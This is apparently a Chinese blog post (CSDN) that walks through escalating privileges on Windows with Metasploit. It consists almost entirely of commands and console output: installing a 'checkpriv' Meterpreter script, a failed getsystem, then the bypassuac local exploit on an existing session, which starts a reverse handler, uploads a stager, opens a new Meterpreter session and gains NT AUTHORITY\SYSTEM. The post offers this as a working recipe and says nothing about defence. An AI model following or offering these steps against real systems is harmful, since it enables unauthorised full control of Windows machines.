关闭

Metasploit - bypassuac

609人阅读 评论(0) 收藏 举报
分类:

Download: checkpriv

Installation:
cp checkpriv.rb /opt/metasploit-framework/scripts/meterpreter/checkpriv.rb

meterpreter > run checkpriv
[*] Admin token: false
[*] Running as SYSTEM: false
[*] UAC Enabled: true
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
msf exploit(bypassuac) > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set SESSION 3
SESSION => 3
msf exploit(bypassuac) > run

[*] Started reverse handler on 192.168.1.100:4444 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[+] Part of Administrators group! Continuing...
[*] Uploaded the agent to the filesystem....
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Sending stage (957486 bytes) to 192.168.1.100
[*] Meterpreter session 5 opened (192.168.1.100:4444 -> 192.168.1.100:53232) at 2015-11-17 14:48:09 +0000

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run checkpriv
[*] Admin token: true
[*] Running as SYSTEM: true
[*] UAC Enabled: false
0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    安全书籍